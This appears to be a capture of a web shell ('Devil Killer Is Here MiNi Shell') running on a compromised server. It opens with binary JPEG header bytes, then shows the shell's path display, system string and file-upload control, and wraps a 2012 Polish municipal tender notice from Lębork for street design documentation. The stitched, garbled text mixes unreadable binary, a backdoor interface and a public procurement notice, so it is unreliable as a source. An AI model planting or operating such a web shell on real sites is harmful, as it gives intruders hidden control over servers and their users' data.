JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120525/173600-N-2012.html

<p class="kh_header"><b>Lębork: DOKUMENTACJA PROJEKTOWA BUDOWY ULIC: STRZELCÓW PODHALAŃSKICH, DYWIZJONU 303, SPÓŁDZIELCZA, BŁĘKITNA, PODHALAŃSKA W LĘBORKU</b><br>
<b>Numer ogłoszenia: 173600 - 2012; data zamieszczenia: 25.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lębork , ul. Armii Krajowej 14, 84-300 Lębork, woj. pomorskie, tel. 59 862 42 80, faks 59 862 24 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lebork.pl, www.wybierzlebork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOKUMENTACJA PROJEKTOWA BUDOWY ULIC: STRZELCÓW PODHALAŃSKICH, DYWIZJONU 303, SPÓŁDZIELCZA, BŁĘKITNA, PODHALAŃSKA W LĘBORKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.
Zakres projektu

1.1.
Wykonanie dokumentacji projektowej (projekt budowlany oraz wykonawczy) budowy ulic: 
- Strzelców Podhalańskich (dz. nr 165, 186, 153, 206 obr. 5) - o długości jezdni       ok. 0,16 km;
- Dywizjonu 303 ( dz. nr 222, 206, 258, 235, 209 obr. 5) - o długości jezdni             ok. 0,16 km;
- Spółdzielcza (dz. nr 19, 151, 79, 81 obr. 5) - o długości jezdni ok. 0,20 km;
- Błękitna (dz. nr 395, 228, 396, 244 obr. 1) - o długości jezdni ok. 0,27 km;
- Podhalańska (dz. nr 108/1, 160, 105, 107 obr. 1) - o długości jezdni ok. 0,23 km;
w Lęborku wraz z odprowadzeniem wód opadowych i roztopowych.  
Lokalizację - przedstawiono na mapce poglądowej stanowiącej Załącznik Nr 6 do SIWZ.
    
1.2.
Parametry projektowanych ulic:
- ulica z kategorią ruchu KR1;
- nawierzchnia jezdni - bitumiczna;
- chodnik po obu stronach jezdni o szer. 2 m przy krawężniku z kostki betonowej gr. 6 cm kolor szary;
- zjazdy z kostki betonowej koloru czerwonego gr. 8 cm;
              
1.3.
Wody opadowe i roztopowe:


1.3.1.
ul. Strzelców Podhalańskich, ul. Dywizjonu 303 - odprowadzenie wód opadowych i roztopowych do istniejącej kanalizacji deszczowej bądź odbiornika po uprzednim podczyszczeniu, zgodnie z Koncepcją projektową infrastruktury technicznej w zakresie ulic i ich odwodnienia ( Załącznik Nr 12  do SIWZ).


1.3.2.
ul. Spółdzielcza - odprowadzenie wód opadowych i roztopowych do rowu melioracyjnego znajdującego się przy ul. Spółdzielczej po uprzednim podczyszczeniu, poprzez istniejący system w ul. Spółdzielczej oraz projektowany ( w ramach projektu ul. Gryfa Pomorskiego ).


1.3.3.
ul. Błękitna - odprowadzenie wód opadowych i roztopowych do istniejącej kanalizacji deszczowej w ul. Artylerzystów bądź do rowu melioracyjnego w ul. Pomorskiej po uprzednim podczyszczeniu.


1.3.4.
ul. Podhalańska - odprowadzenie wód opadowych i roztopowych do rowu melioracyjnego w ul. Lubelskiej lub w ul. Myśliwskiej po uprzednim podczyszczeniu.
Wykonawca zobowiązany jest do dostarczenia Zamawiającemu kompletu dokumentacji odrębnie dla każdej z ulic, w formie i w ilości:
2.1.
Projekt budowlany - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. z 2004r., nr 202 poz. 2072 z późn. zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego - po 5 egzemplarzy dla zamawiającego 2 egzemplarze zatwierdzone przez organ wydający pozwolenie na budowę i 3 dodatkowe egzemplarze wraz z wersją elektroniczną (2 egz.);                    
2.2.
Projekt wykonawczy - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. z 2004r., nr 202 poz. 2072 z późn. zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego - po 5 egzemplarzy dla zamawiającego 2 egzemplarze zatwierdzone przez organ wydający pozwolenie na budowę i 3 dodatkowe egzemplarze wraz z wersją elektroniczną (2 egz.);                  
2.3.
 Projekt organizacji ruchu - uzgodniony - w 3 egzemplarzach dla każdej z ulic wraz z wersją elektroniczną zapisaną w ogólnie dostępnym formacie ( np. doc, pdf, inne); 
2.4.
Kosztorys inwestorski - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia  18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r. nr 130 poz. 1389) - w 1 egzemplarzu wraz z wersją elektroniczną zapisaną w ogólnie dostępnym formacie (np. .doc, .pdf, inne);
2.5.


Specyfikację techniczną wykonania i odbioru robót budowlanych - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. z 2004r., nr 202 poz. 2072 z późn. zm.)  w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego  - w 3 egzemplarzach wraz z wersją elektroniczną specyfikacji zapisaną w ogólnie dostępnym formacie (np. .doc, .pdf, inne);
2.6.
Przedmiar robót - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. z 2004r., nr 202 poz. 2072 z późn. zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego - w 5 egzemplarzach wraz z wersją elektroniczną zapisaną w ogólnie dostępnym formacie (np. .doc, .pdf, inne);
2.7.
Informacja dotyczące bezpieczeństwa i ochrony zdrowia, w przypadkach, gdy ich opracowanie jest wymagane - w 5 egzemplarzach wraz z wersją elektroniczną informacji zapisaną w ogólnie dostępnym formacie (np. .doc, .pdf, inne).
Obowiązkiem projektanta jest również uzyskanie wszelkich niezbędnych opinii, uzgodnień i sprawdzeń rozwiązań projektowych w zakresie wynikającym z właściwych przepisów,a także uzgodnień projektów w ZUDP, pozwoleń wodnoprawnych wraz z uzyskaniem POZWOLEŃ NA BUDOWĘ.
3.1.
Zamawiający w dniu podpisania umowy wystawi Wykonawcy pełnomocnictwo (w 5 egzemplarzach) do występowania w jego imieniu w sprawie uzyskania niezbędnych decyzji, opinii, uzgodnień z pozwoleniem na budowę włącznie (wzór pełnomocnictwa  stanowi Załącznik nr 4 do SIWZ). W przypadku, gdyby niezbędna była dodatkowa kopia pełnomocnictwa poświadczona za zgodność z oryginałem, Wykonawca niezwłocznie ją otrzyma.
3.2.
Oświadczenia o posiadanym prawie do dysponowania nieruchomościami na cele budowlane, które są wymagane do złożenia z niektórymi wnioskami, podpisywać będzie Burmistrz Miasta Lęborka.
Ustalenia dodatkowe:
4.1.
Zamawiający zastrzega sobie prawo wglądu do zamówionych prac projektowych w trakcie ich sporządzania.
4.2.
Wykonawca jest zobowiązany przedłożyć i uzgodnić z Zamawiającym wstępną koncepcję projektu.
4.3.
Wykonawca musi uzyskać mapy do celów projektowych w zakresie niezbędnym do wykonania zamówienia, kopie map należy dostarczyć Zamawiającemu.
4.4.
W projekcie kanalizacji deszczowej i w kosztorysie należy przewidzieć zastosowanie krat wpustów ulicznych wyposażonych w zawiasy, które utrudniają kradzieże.
4.5.
Niweletę jezdni należy zaprojektować w taki sposób, aby zapewnić odprowadzenie wód opadowych ze zjazdów, na jezdnię przy jednoczesnym dostosowaniu rzędnych wjazdu do istniejących rzędnych bram.
4.6.
W kosztorysach i przedmiarach robót należy uwzględnić tylko następujące elementy: nawierzchnia, krawężnik, odwodnienie wraz z robotami ziemnymi towarzyszącymi.
4.7.
W dokumentacji projektowej należy wprowadzić elementy uspokojenia ruchu - do ustalenia z Zamawiającym na etapie opracowywania wstępnej koncepcji.
4.8.
Wykonawca projektów przenosi na Zamawiającego autorskie prawa majątkowe w całości, automatycznie z chwilą wypłacenia przez Zamawiającego wynagrodzenia za opracowania.
4.9.
Zamawiający może wykorzystać przedmiotowy projekt budowlany i wykonawczy w całości lub w dowolnych częściach przy dalszych etapach realizacyjnych.
4.10.
W dokumentacji projektowej nie należy odnosić się do konkretnej marki ani źródła, znaku handlowego, patentu, typu, pochodzenia lub produkcji. W przypadku gdy jest to niezbędne dla dostatecznie precyzyjnego i zrozumiałego opisu, należy wskazać dopuszczalne rozwiązania równoważne opisywanym wraz  podaniem parametrów równoważności.
4.11.
W związku z koniecznością zamieszczenia informacji o zamiarze rozpoczęcia budowy drogi związanej z wybudowaniem kanału technologicznego (zgodnie z art. 39 ust. 6a ustawy o drogach publicznych, Dz. U. 2007 r. nr 19 poz. 115 z późn. zm.), wniosek o pozwolenie na budowę należy złożyć nie wcześniej niż 27.09.2012r.  
4.12.
Zamawiający zapewnia:
Wypisy i wyrysy z miejscowego planu zagospodarowania przestrzennego (Załącznik Nr 7, 8, 9, 10, 11 do SIWZ);
 Koncepcje projektową infrastruktury technicznej w zakresie ulic i ich odwodnienia (ulice: Powstania Styczniowego, Powstańców Warszawy, Sosabowskiego, Szarych Szeregów, Dywizjonu 303, Strzelców Podhalańskich, Batalionu Zośka i Orląt Lwowskich) na osiedlu Harcerzy w Lęborku (Załącznik Nr 12 do SIWZ).
4.13.
Przed złożeniem oferty i ustaleniem wartości ryczałtowej prac należy dokonać dokładnej wizji w terenie oraz przeanalizować opis przedmiotu zamówienia z załączonymi materiałami. Wykonawca dokona dokładnego rozpoznania, co do ryzyka, trudności i wszelkich innych okoliczności jakie mogą wpłynąć na wykonanie zamówienia.
W uzasadnionych przypadkach Zamawiający zastrzega sobie prawo zmiany treści SIWZ. Dokonaną zmianę Zamawiający przekaże niezwłocznie wszystkim Wykonawcom, którym przekazano niniejszą SIWZ lub którzy wypełnili formularz na stronie internetowej. Zmiana treści SIWZ zostanie zamieszczona również na stronie internetowej Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.
Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych. Zamówienia uzupełniające mogą w szczególności obejmować:

1.1.
zwiększenie zakresu prac m. in. przez rozszerzenie rodzaju i zakresu decyzji, uzgodnień i innych dokumentów koniecznych do uzyskania pozwoleń na budowę,

1.2.
zwiększenie zakresu prac projektowych spowodowane m. in. zmianami warunków wyjściowych do projektowania.

Łączna wartość zamówień uzupełniających nie przekroczy 50 % wartości realizowanego zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 180.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia - Załącznik nr 2 do SIWZ.
Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia - Załącznik nr 2 do SIWZ. 
Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia - Załącznik nr 2 do SIWZ. 
Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia - Załącznik nr 2 do SIWZ. 
Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie o spełnieniu warunków udziału w postępowaniu- wypełniony Załącznik nr 2 do SIWZ. 2.Ewentualne pełnomocnictwo do podejmowania zobowiązań w imieniu Wykonawcy. 3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów wymienionych w Rozdziale III  4.3.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 4. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymienione w Rozdziale III.4.2  oraz w Rozdziale III.6.3 każdy z Wykonawców składa indywidualnie; dokument wymieniony w Rozdziale III.6.1. składa Pełnomocnik w imieniu wszystkich Wykonawców. 6. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 7. Wszystkie kserokopie winny być poświadczone za zgodność z oryginałem przez Wykonawcę lub osobę podpisującą ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian postanowień umowy zawartej w wyniku postępowania w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Poniższe postanowienia stanowią dopuszczalny katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią  jednocześnie zobowiązania do wyrażenia takiej zgody.
Zamawiający określa następujące warunki zmiany:
1.1.
Zmiana terminu w przypadku:

1.1.1.
w przypadku udzielenia dotychczasowemu Wykonawcy zamówień dodatkowych lub uzupełniających, jeżeli ich wykonanie spowoduje taką konieczność;

1.1.2.
w przypadku opóźnienia w wykonaniu zamówienia z następujących przyczyn:

a.
wydłużające się nie z winy Wykonawcy procedury postępowań administracyjnych;

b.
zmiany warunków wyjściowych do projektowania, których nie można było przewidzieć na etapie składania oferty;

c.
przyczyny leżące po stronie Zamawiającego, m.in. konieczność usunięcia błędów lub wprowadzenia zmian w dokumentach stanowiących podstawę projektowania, konieczność dokonania ustaleń i udzielenia wyjaśnień;

d.
inne przyczyny, za które nie odpowiada Wykonawca;
1.2.
Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawki podatku VAT.

Ustala się, iż nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp:

a.
zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr rachunku bankowego);

b.
zmiana osób przeznaczonych do realizacji przedmiotu umowy (wymagana jest zgoda Zamawiającego);

c.
zmiana danych teleadresowych.

Zaistnienie okoliczności, o których mowa w niniejszym punkcie wymaga niezwłocznego pisemnego zawiadomienia Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.lebork.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lęborku, ul. Armii Krajowej 14, Wydział Gospodarki Miejskiej i Inwestycji - skrzydło C, pokój 105C..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 12:00, miejsce: Kancelaria Ogólna Urzędu Miejskiego w Lęborku, ul. Armii Krajowej 14 - BOX nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com